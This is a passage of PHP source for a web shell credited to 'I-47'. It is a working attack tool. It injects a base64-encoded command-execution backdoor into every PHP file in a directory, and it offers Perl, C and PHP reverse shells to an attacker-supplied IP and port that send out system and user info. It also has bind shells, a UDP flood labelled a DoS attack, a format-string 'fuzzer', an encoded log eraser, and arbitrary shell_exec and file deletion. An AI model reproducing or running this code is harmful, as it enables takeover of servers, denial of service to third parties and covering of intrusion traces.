  3401. <table id="margins" >
  3402. <tr>
  3403. <form method='POST'>
  3404. <input type="hidden" name="injector"/>
  3405. <tr>
  3406. <td width="100" class="title">
  3407. Directory
  3408. </td>
  3409. <td>
  3410. <input class="box" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
  3411. </td>
  3412. </tr>
  3413. <tr>
  3414. <td class="title">
  3415. Mode
  3416. </td>
  3417. <td>
  3418. <select style="width: 400px;" name="mode" class="box">
  3419. <option value="Apender">Apender</option>
  3420. <option value="Overwriter">Overwriter</option>
  3421. </select>
  3422. </td>
  3423. </tr>
  3424. <tr>
  3425. <td class="title">
  3426. File Type
  3427. </td>
  3428. <td>
  3429. <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
  3430. </td>
  3431. </tr>
  3432. <tr>
  3433. <td>Create A backdoor by injecting this code in every php file of current directory</td>
  3434. </tr>
  3435.  
  3436. <tr>
  3437. <td colspan="2">
  3438. <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode("PD9waHAgJGNtZCA9IDw8PEVPRA0KY21kDQpFT0Q7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFskY21kXSkpIHsNCnN5c3RlbSgkX1JFUVVFU1RbJGNtZF0pOyB9ID8+"); ?></textarea>
  3439. </td>
  3440. </tr>
  3441.  
  3442.  
  3443. <tr>
  3444. <td rowspan="2">
  3445. <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value="Inject "/>
  3446. </td>
  3447. </tr>
  3448. </form>
  3449. </table>
  3450. <?php
  3451. }
  3452. // Connect
  3453.  
  3454. else if(isset($_GET['connect']))
  3455. {
  3456. if(isset($_POST['ip']) && isset($_POST['port']) && $_POST['ip'] != "" && $_POST['port'] != "" )
  3457. {
  3458.  
  3459. $host = $_POST['ip'];
  3460. $port = $_POST['port'];
  3461. if($_POST["lang"] == "perl")
  3462. {
  3463. if(is_writable("."))
  3464. {
  3465. @$fh=fopen(getcwd()."/bc.pl",'w');
  3466. @fwrite($fh,gzinflate(base64_decode($backconnect_perl)));
  3467. @fclose($fh);
  3468. echo "<font color='#FFFFFF' size=3>Attempting to connect...</font></br>";
  3469. execmd("perl ".getcwd()."/bc.pl $host $port",$disable);
  3470. if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FFFFFF' size=3>Warning: Failed to delete reverse-connection program</font></br>";
  3471. }
  3472. else
  3473. {
  3474. @$fh=fopen("/tmp/bc.pl","w");
  3475. @fwrite($fh,gzinflate(base64_decode($backconnect_perl)));
  3476. @fclose($fh);
  3477. echo "<font color='#FFFFFF' size=3>Attempting to connect...</font></br>";
  3478. execmd("perl /tmp/bc.pl $host $port",$disable);
  3479. if(!@unlink("/tmp/bc.pl")) echo "<font color='#FF0000'><h2>Warning: Failed to delete reverse-connection program<</h2>/font></br>";
  3480. }
  3481. }
  3482. else if($_POST["lang"] == "c")
  3483. {
  3484. if(is_writable("."))
  3485. {
  3486. $w_file=@fopen("backc","w") or err();
  3487. if($w_file)
  3488. {
  3489. @fputs($w_file,@base64_decode($back_connect_c));
  3490. @fclose($w_file);
  3491. }
  3492. chmod('backc', 0777);
  3493. //$blah = ex("gcc back.c -o backc");
  3494. $blah = execmd("./backc ".$host." ".$port." &");
  3495. echo "<font color='#FFFFFF' size=3>Attempting to connect...</font></br>";
  3496. $_POST['backcconnmsg']="Trying to connect to <b>".$host."</b> on port <b>".$port."</b>.";
  3497. //if (file_exists("back.c")) { unlink("back.c"); }
  3498. if (file_exists("backc"))
  3499. {
  3500. unlink("backc"); }
  3501. }
  3502. else
  3503. {
  3504. chmod('/tmp/backc', 0777);
  3505. $w_file=@fopen("/tmp/backc","w") or err();
  3506. if($w_file)
  3507. {
  3508. @fputs($w_file,@base64_decode($back_connect_c));
  3509. @fclose($w_file);
  3510. }
  3511. //$blah = ex("gcc -o /tmp/backc /tmp/back.c");
  3512. $blah = execmd("./backc ".$host." ".$port." &");
  3513. echo "<font color='#FFFFFF' size=3>Attempting to connect...</font></br>";
  3514. $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
  3515. //if (file_exists("back.c")) { unlink("back.c"); }
  3516. if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); }
  3517. }
  3518. }
  3519. else if($_POST["lang"] == "php")
  3520. {
  3521. echo "<font color='#FFFFFF' size=3>Attempting to connect...</font>";
  3522. $ip = $_POST['ip'];
  3523. $port=$_POST['port'];
  3524. $sockfd=fsockopen($ip , $port , $errno, $errstr );
  3525. if($errno != 0)
  3526. {
  3527. echo "<font color='red'><b>$errno</b> : $errstr</font>";
  3528. }
  3529. else if (!$sockfd)
  3530. {
  3531. $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
  3532. }
  3533. else
  3534. {
  3535. fputs ($sockfd ,"\n=================================================================\nCoded By Arjun\n=================================================================");
  3536. $pwd = exec_all("pwd");
  3537. $sysinfo = exec_all("uname -a");
  3538. $id = exec_all("id");
  3539. $len = 1337;
  3540. fputs($sockfd ,$sysinfo . "\n" );
  3541. fputs($sockfd ,$pwd . "\n" );
  3542. fputs($sockfd ,$id ."\n\n" );
  3543. fputs($sockfd ,$dateAndTime."\n\n" );
  3544. while(!feof($sockfd))
  3545. {
  3546. $cmdPrompt ="(I47)[$]> ";
  3547. fputs ($sockfd , $cmdPrompt );
  3548. $command= fgets($sockfd, $len);
  3549. fputs($sockfd , "\n" . exec_all($command) . "\n\n");
  3550. }
  3551. fclose($sockfd);
  3552. }
  3553. }
  3554. }
  3555. else if(isset($_POST['passwd']) && isset($_POST['port']) && isset($_POST['lang']))
  3556. {
  3557. $passwd = $_POST['passwd'];
  3558. if($_POST['lang'] == 'c')
  3559. {
  3560. if(is_writable("."))
  3561. {
  3562. @$fh=fopen(getcwd()."/bp.c",'w');
  3563. @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
  3564. @fclose($fh);
  3565. execmd("chmod ".getcwd()."/bp.c 0755");
  3566. execmd("gcc -o ".getcwd()."/bp ".getcwd()."/bp.c");
  3567. execmd("chmod ".getcwd()."/bp 0755");
  3568. $out = execmd(getcwd()."/bp"." ".$_POST['port']." ". $passwd ." &");
  3569. echo "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
  3570. }
  3571. else
  3572. {
  3573. @$fh=fopen("/tmp/bp.c","w");
  3574. @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
  3575. @fclose($fh);
  3576. execmd("chmod /tmp/bp.c 0755");
  3577. execmd("gcc -o /tmp/bp /tmp/bp.c");
  3578. $out = execmd("/tmp/bp"." ".$_POST['port']." ". $passwd ." &");
  3579. echo "<pre>$out\n".execmd("ps aux | grep bp")."</pre>";
  3580. }
  3581. }
  3582. if($_POST['lang'] == 'perl')
  3583. {
  3584. if(is_writable("."))
  3585. {
  3586. @$fh=fopen(getcwd()."/bp.pl",'w');
  3587. @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
  3588. @fclose($fh);
  3589. execmd("chmod ".getcwd()."/bp.pl 0755");
  3590. $out = execmd("perl ".getcwd()."/bp.pl" . " " . $passwd ." &");
  3591. echo "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
  3592. }
  3593. else
  3594. {
  3595. @$fh=fopen("/tmp/bp.pl","w");
  3596. @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
  3597. @fclose($fh);
  3598. $out = execmd("perl /tmp/bp.pl ". $passwd ." &");
  3599. echo "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
  3600. }
  3601. }
  3602. }
  3603. else
  3604. {
  3605. ?>
  3606. <table style="width:50%" align="center" >
  3607. <tr>
  3608. <th colspan="1" width="50px">Reverse Shell</th>
  3609. <th colspan="1" width="50px">Bind Shell</th>
  3610. </tr>
  3611. <tr>
  3612. <form action='<?php echo $self; ?>?connect' method='post' >
  3613. <td>
  3614. <table style="border-spacing: 6px;">
  3615. <tr>
  3616. <td>IP </td>
  3617. <td>
  3618. <input type="text" class="box" style="width: 200px;" name="ip" value="<?php yourip();?>" />
  3619. </td>
  3620. </tr>
  3621. <tr>
  3622. <td>Port </td>
  3623. <td><input style="width: 200px;" class="box" name="port" size='5' value="21"/></td>
  3624. </tr>
  3625. <tr>
  3626. <td style="vertical-align:top;">Use:</td>
  3627. <td><select style="width: 95px;" name="lang" class="sbox">
  3628. <option value="perl">Perl</option>
  3629. <option value="c">C</option>
  3630. <option value="php">PHP</option>
  3631. </select>&nbsp;&nbsp;
  3632. <input style="width: 90px;" class="but" type="submit" value="Connect!"/></td>
  3633.  
  3634. </tr>
  3635. </table>
  3636. </td>
  3637. </form>
  3638. <form action='<?php echo $self; ?>?connect' method='post' >
  3639. <td style="vertical-align:top;">
  3640. <table style="border-spacing: 6px;">
  3641. <tr>
  3642. <td>Port</td>
  3643. <td>
  3644. <input style="width: 200px;" class="box" name="port" value="21" />
  3645. </td>
  3646. </tr>
  3647. <tr>
  3648. <td>Password </td>
  3649. <td>
  3650. <input style="width: 200px;" class="box" name="passwd" value="I-47"/>
  3651. </td>
  3652. <tr>
  3653. <td>Using</td>
  3654. <td>
  3655. <select style="width: 95px;" name="lang" id="lang" class="sbox">
  3656. <option value="perl">Perl</option>
  3657. <option value="c">C</option>
  3658. </select>&nbsp;&nbsp;
  3659. <input style="width: 90px;" class="but" type="submit" value=" Bind "/></td>
  3660. </tr>
  3661. </table>
  3662. </td>
  3663. </form>
  3664. </tr>
  3665. </table>
  3666. <div align="center"><font color="#FF0000" size="3">Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p 21"!</font></div>
  3667. <p align="center"><font color="#FF0000" size="3">Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</font></p>
  3668. <?php
  3669. }
  3670. }
  3671.  
  3672. //fuzzer
  3673.  
  3674. else if(isset($_GET['fuzz']))
  3675. {
  3676. if(isset($_GET['ip']) &&
  3677. isset($_GET['port']) &&
  3678. isset($_GET['times']) &&
  3679. isset($_GET['time']) &&
  3680. isset($_GET['message']) &&
  3681. isset($_GET['messageMultiplier']) &&
  3682. $_GET['message'] != "" &&
  3683. $_GET['time'] != "" &&
  3684. $_GET['times'] != "" &&
  3685. $_GET['port'] != "" &&
  3686. $_GET['ip'] != "" &&
  3687. $_GET['messageMultiplier'] != ""
  3688. )
  3689. {
  3690. $IP=$_GET['ip'];
  3691. $port=$_GET['port'];
  3692. $times = $_GET['times'];
  3693. $timeout = $_GET['time'];
  3694. $send = 0;
  3695. $ending = "";
  3696. $multiplier = $_GET['messageMultiplier'];
  3697. $data = "";
  3698. $mode="tcp";
  3699. $data .= "GET /";
  3700. $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
  3701. if($_GET['type'] == "tcp")
  3702. {
  3703. $mode = "tcp";
  3704. }
  3705. while($multiplier--)
  3706. {
  3707. $data .= urlencode($_GET['message']);
  3708. }
  3709. $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
  3710. $data .= "by-I-47".$ending;
  3711. $length = strlen($data);
  3712.  
  3713.  
  3714. echo "Sending Data :- <br /> <p align='center'>$data</p>";
  3715.  
  3716. print "I am at ma Work now :D ;D! Dont close this window untill you recieve a message <br>";
  3717. for($i=0;$i<$times;$i++)
  3718. {
  3719. $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
  3720. if($socket)
  3721. {
  3722. fwrite($socket , $data , $length );
  3723. fclose($socket);
  3724. }
  3725. }
  3726. echo "<script>alert('Fuzzing Completed!');</script>";
  3727. echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
  3728. echo "Total Number of Packets Sent : " . $times . "<br />";
  3729. echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br />";
  3730. echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
  3731. }
  3732. else
  3733. {
  3734. ?>
  3735. <form method="GET">
  3736. <input type="hidden" name="fuzz" />
  3737. <table id="margins">
  3738. <tr>
  3739. <td width="400" class="title">
  3740. IP
  3741. </td>
  3742. <td>
  3743. <input class="box" name="ip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
  3744. </td>
  3745. </tr>
  3746.  
  3747. <tr>
  3748. <td class="title">
  3749. Port
  3750. </td>
  3751. <td>
  3752. <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
  3753. </td>
  3754. </tr>
  3755.  
  3756. <tr>
  3757. <td class="title">
  3758. Timeout
  3759. </td>
  3760. <td>
  3761. <input type="text" class="box" name="time" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';"/>
  3762. </td>
  3763. </tr>
  3764.  
  3765.  
  3766. <tr>
  3767. <td class="title">
  3768. No of times
  3769. </td>
  3770. <td>
  3771. <input type="text" class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';" />
  3772. </td>
  3773. </tr>
  3774.  
  3775. <tr>
  3776. <td class="title">
  3777. Message <font color="red">(The message Should be long and it will be multiplied with the value after it)</font>
  3778. </td>
  3779. <td>
  3780. <input class="box" name="message" value="%S%x--Some Garbage here --%x%S" onFocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onBlur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
  3781. </td>
  3782. <td>
  3783. x
  3784. </td>
  3785. <td width="20">
  3786. <input style="width: 30px;" class="box" name="messageMultiplier" value="10" />
  3787. </td>
  3788. </tr>
  3789.  
  3790. <tr>
  3791. <td rowspan="2">
  3792. <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="submit" class="but" value=" Submit "/>
  3793. </td>
  3794. </tr>
  3795. </table>
  3796. </form>
  3797. <?php
  3798. }
  3799. }
  3800.  
  3801.  
  3802. //DDos
  3803.  
  3804. else if(isset($_GET['dos']))
  3805. {
  3806. if(isset($_GET['ip']) && isset($_GET['exTime']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && $_GET['exTime'] != "" &&
  3807. $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['timeout'] != "" && $_GET['exTime'] != "" )
  3808. {
  3809. $IP=$_GET['ip'];
  3810. $port=$_GET['port'];
  3811. $executionTime = $_GET['exTime'];
  3812. $noOfBytes = $_GET['noOfBytes'];
  3813. $data = "";
  3814. $timeout = $_GET['timeout'];
  3815. $packets = 0;
  3816. $counter = $noOfBytes;
  3817. $maxTime = time() + $executionTime;;
  3818. while($counter--)
  3819. {
  3820. $data .= "X";
  3821. }
  3822. $data .= " I-47";
  3823. print "I am at ma Work now :D ;D! Dont close this window untill you recieve a message <br>";
  3824.  
  3825. while(1)
  3826. {
  3827. $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
  3828. if($socket)
  3829. {
  3830. fwrite($socket , $data);
  3831. fclose($socket);
  3832. $packets++;
  3833. }
  3834. if(time() >= $maxTime)
  3835. {
  3836. break;
  3837. }
  3838. }
  3839. echo "<script>alert('Dos Completed!');</script>";
  3840. echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."<br />";
  3841. echo "Total Number of Packets Sent : " . $packets . "<br />";
  3842. echo "Total Data Sent = ". HumanReadableFilesize($packets*$noOfBytes) . "<br />";
  3843. echo "Data per packet = " . HumanReadableFilesize($noOfBytes) . "<br />";
  3844. }
  3845. else
  3846. {
  3847. ?>
  3848. <form method="GET">
  3849. <input type="hidden" name="dos" />
  3850. <table id="margins">
  3851. <tr>
  3852. <td width="400" class="title">
  3853. IP
  3854. </td>
  3855. <td>
  3856. <input class="box" name="ip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
  3857. </td>
  3858. </tr>
  3859.  
  3860. <tr>
  3861. <td class="title">
  3862. Port
  3863. </td>
  3864. <td>
  3865. <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
  3866. </td>
  3867. </tr>
  3868.  
  3869. <tr>
  3870. <td class="title">
  3871. Timeout <font color="red">(Time in seconds)</font>
  3872. </td>
  3873. <td>
  3874. <input type="text" class="box" name="timeout" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';" />
  3875. </td>
  3876. </tr>
  3877.  
  3878.  
  3879. <tr>
  3880. <td class="title">
  3881. Execution Time <font color="red">(Time in seconds)</font>
  3882. </td>
  3883. <td>
  3884. <input type="text" class="box" name="exTime" value="10" onFocus="if(this.value == '10')this.value = '';" onBlur="if(this.value=='')this.value='10';"/>
  3885. </td>
  3886. </tr>
  3887.  
  3888. <tr>
  3889. <td class="title">
  3890. No of Bytes per/packet
  3891. </td>
  3892. <td>
  3893. <input type="text" class="box" name="noOfBytes" value="999999" onFocus="if(this.value == '999999')this.value = '';" onBlur="if(this.value=='')this.value='999999';"/>
  3894. </td>
  3895. </tr>
  3896.  
  3897.  
  3898. <tr>
  3899. <td rowspan="2">
  3900. <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="submit" class="but" value=" Attack >> "/>
  3901. </td>
  3902. </tr>
  3903. </table>
  3904. </form>
  3905. <?php
  3906. }
  3907. }
  3908.  
  3909. // Sec info
  3910. else if(isset($_GET['secinfo']))
  3911. { ?>
  3912. <br><br><center><font color =red size=5>Server security information</font><br><br></center>
  3913. <table style="width:100%;" border="1">
  3914. <tr>
  3915. <td style="width:7%;">Curl</td>
  3916. <td style="width:7%;">Oracle</td>
  3917. <td style="width:7%;">MySQL</td>
  3918. <td style="width:7%;">MSSQL</td>
  3919. <td style="width:7%;">PostgreSQL</td>
  3920. <td style="width:12%;">Open Base Directory</td>
  3921. <td style="width:10%;">Safe_Exec_Dir</td>
  3922. <td style="width:7%;">PHP Version</td>
  3923. <td style="width:7%;">Server Admin</td>
  3924. </tr>
  3925. <tr>
  3926. <td style="width:7%;"><font class="txt"><?php curlinfo(); ?></font></td>
  3927. <td style="width:7%;"><font class="txt"><?php oracleinfo(); ?></font></td>
  3928. <td style="width:7%;"><font class="txt"><?php mysqlinfo(); ?></font></td>
  3929. <td style="width:7%;"><font class="txt"><?php mssqlinfo(); ?></font></td>
  3930. <td style="width:7%;"><font class="txt"><?php postgresqlinfo(); ?></font></td>
  3931. <td style="width:12%;"><font class="txt"><?php echo $basedir; ?></font></td>
  3932. <td style="width:10%;"><font class="txt"><?php if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};} ?></font></td>
  3933. <td style="width:7%;"><font class="txt"><?php phpver(); ?></font></td>
  3934. <td style="width:7%;"><font class="txt"><?php serveradmin(); ?></font></td>
  3935. </tr>
  3936. </table><br> <?php
  3937. mysecinfo();
  3938. }
  3939.  
  3940.  
  3941. else if(isset($_GET['perms']))
  3942. {
  3943. ?>
  3944. <form method="POST" action="<?php echo $self; ?>" >
  3945. <input type="hidden" name="myfilename" value="<?php echo $_GET['file']; ?>">
  3946. <table align="center" border="1" style="width:40%;">
  3947. <tr>
  3948. <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
  3949. </tr>
  3950. <tr>
  3951. <td colspan="2" align="center" style="height:60px">
  3952. <input type="Submit" value="Change Permission" class="but" style="padding: 5px;" name="changeperms"/></td>
  3953. </tr>
  3954. </table>
  3955.  
  3956. </form>
  3957. <?php
  3958. }
  3959.  
  3960. else if(isset($_GET['rename']))
  3961. {
  3962. ?>
  3963. <form method="GET" action="<?php echo $self; ?>" >
  3964. <input type="hidden" name="getdir" value="<?php echo $_GET['getdir']; ?>">
  3965. <table>
  3966. <tr>
  3967. <td>File </td><td> : </td><td><input value="<?php echo $_GET['rename'];?>" name="file" class="box" /></td>
  3968. </tr>
  3969. <tr>
  3970. <td>To </td><td> : </td><td><input value="<?php echo $_GET['rename'];?>" name="to" class="box" /></td>
  3971. </tr>
  3972. </table>
  3973. <br>
  3974. <input type="Submit" value="Rename It" class="but" style="margin-left: 160px;padding: 5px;"/>
  3975. </form>
  3976. <?php
  3977.  
  3978. }
  3979. else if(isset($_GET['open']))
  3980. {
  3981. ?>
  3982. <form method="POST" action="<?php echo $self;?>"\>
  3983. <table>
  3984. <tr>
  3985. <td>File </td><td> : </td><td><input value="<?php echo $_GET['open'];?>" class="box" name="file" /></td>
  3986. </tr>
  3987. <tr>
  3988. <td>Size </td><td> : </td><td><input value="<?php echo filesize($_GET['open']);?>" class="box" /></td>
  3989. </tr>
  3990. </table>
  3991. <textarea name="content" rows="20" cols="100" class="box"><?php
  3992. $content = htmlspecialchars(file_get_contents($_GET['open']));
  3993. if($content)
  3994. {
  3995. echo $content;
  3996. }
  3997. else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
  3998. {
  3999. fopen($_GET['open']);
  4000. while(!feof())
  4001. {
  4002. echo htmlspecialchars(fgets($_GET['open']));
  4003. }
  4004. }
  4005.  
  4006. ?>
  4007. </textarea><br />
  4008. <input name="save" type="Submit" value="Save Changes" id="spacing" class="but"/>
  4009. </form>
  4010. <?php
  4011. }
  4012.  
  4013. else if(isset($_POST['file']) &&
  4014. isset($_POST['content']) )
  4015. {
  4016. if(is_dir($_POST['file']))
  4017. {
  4018. header("location:".$self."?dir=".$_POST['file']);
  4019. }
  4020. if(file_exists($_POST['file']))
  4021. {
  4022. $handle = fopen($_POST['file'],"w");
  4023. fwrite($handle,$_POST['content']);
  4024. header("Location:$self");
  4025. }
  4026. else
  4027. {
  4028. echo "<p class='alert'>File Name Specified does not exists!</p>";
  4029. }
  4030. }
  4031.  
  4032. else if(isset($_GET['selfkill']))
  4033. {
  4034. unlink(__FILE__);
  4035. echo "<br><center><font color=lime size=5>Good Bye......</font></center>";
  4036. }
  4037.  
  4038. else if(isset($_POST['executecmd']))
  4039. {
  4040. if($_POST['mycmd']=="logeraser")
  4041. {echo "gfhfgh";
  4042. $erase = gzinflate(base64_decode("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"));
  4043. if(is_writable("."))
  4044. {
  4045. if($openp = fopen(getcwd()."/logseraser.pl", 'w'))
  4046. {
  4047. fwrite($openp, $erase);
  4048. fclose($openp);
  4049. passthru("perl logseraser.pl linux");
  4050. unlink("logseraser.pl");
  4051. echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
  4052. }
  4053. } else
  4054. {
  4055. if($openp = fopen("/tmp/logseraser.pl", 'w'))
  4056. {
  4057. fwrite($openp, $erase)or die("Error");
  4058. fclose($openp);
  4059. $aidx = passthru("perl logseraser.pl linux");
  4060. unlink("logseraser.pl");
  4061. echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
  4062. }
  4063. }
  4064. }
  4065. else
  4066. {
  4067. $check = shell_exec($_POST['mycmd']);
  4068. echo "<textarea cols=120 rows=20 class=box>" . $check . "</textarea>";
  4069. }
  4070. }
  4071.  
  4072. else if(isset($_POST['changefileperms']))
  4073. {
  4074. if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
  4075. {
  4076. $actbox = $_POST["actbox3"];
  4077. foreach ($actbox as $v)
  4078. {
  4079. $perms = 0;
  4080. for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
  4081. $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
  4082. echo "<center><div align=left style=width:60%;>";
  4083. if(@chmod($v,$perms))
  4084. echo "<blink><font size=3 color=lime>File $v Permissions Changed Successfully</font></blink>";
  4085. else
  4086. echo "<blink><font size=3 color=red>Cannot Change $v File Permissions</font></blink>";
  4087. echo "</div></center>";
  4088. }
  4089.  
  4090. }
  4091. }
  4092. else if(isset($_POST['choice']))
  4093. {
  4094. if($_POST['choice'] == "chmod")
  4095. { ?>
  4096. <form method="POST" ><?php
  4097. $actbox1 = $_POST['actbox'];
  4098. foreach ($actbox1 as $v)
  4099. { ?>
  4100. <input type="hidden" name="actbox3[]" value="<?php echo $v; ?>">
  4101. <?php }
  4102. ?>
  4103. <table align="center" border="1" style="width:40%;">
  4104. <tr>
  4105. <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
  4106. </tr>
  4107. <tr>
  4108. <td colspan="2" align="center" style="height:60px">
  4109. <input type="Submit" value="Change Permission" class="but" style="padding: 5px;" name="changefileperms"/></td>
  4110. </tr>
  4111. </table>
  4112.  
  4113. </form> <?php
  4114. }
  4115. else if($_POST['choice'] == "delete")
  4116. {
  4117. $actbox = $_POST["actbox"];
  4118. foreach ($actbox as $v)
  4119. {
  4120. if(is_file($v))
  4121. {
  4122. if(unlink($v))
  4123. {
  4124. echo "<br><center><font color=lime size=3>File $v Deleted Successfully</font></center>";
  4125. }
  4126. else
  4127. echo "<br><center><font color=red size=3>Cannot Delete File $v</font></center>";
  4128. }
  4129. else if(is_dir($v))
  4130. {
  4131. rrmdir($v);
  4132. $loc = $_SERVER['REQUEST_URI'];
  4133. header("Location:$loc");
  4134. ob_end_flush();
  4135. }
  4136. }
  4137. }
  4138. else if($_POST['choice'] == "compre")
  4139. {
  4140. $actbox = $_POST["actbox"];
  4141. foreach ($actbox as $v)
  4142. {
  4143. if(is_file($v))
  4144. {
  4145. $zip = new ZipArchive();
  4146. $filename= basename($v) . '.zip';
  4147. if(($zip->open($filename, ZipArchive::CREATE))!==true)
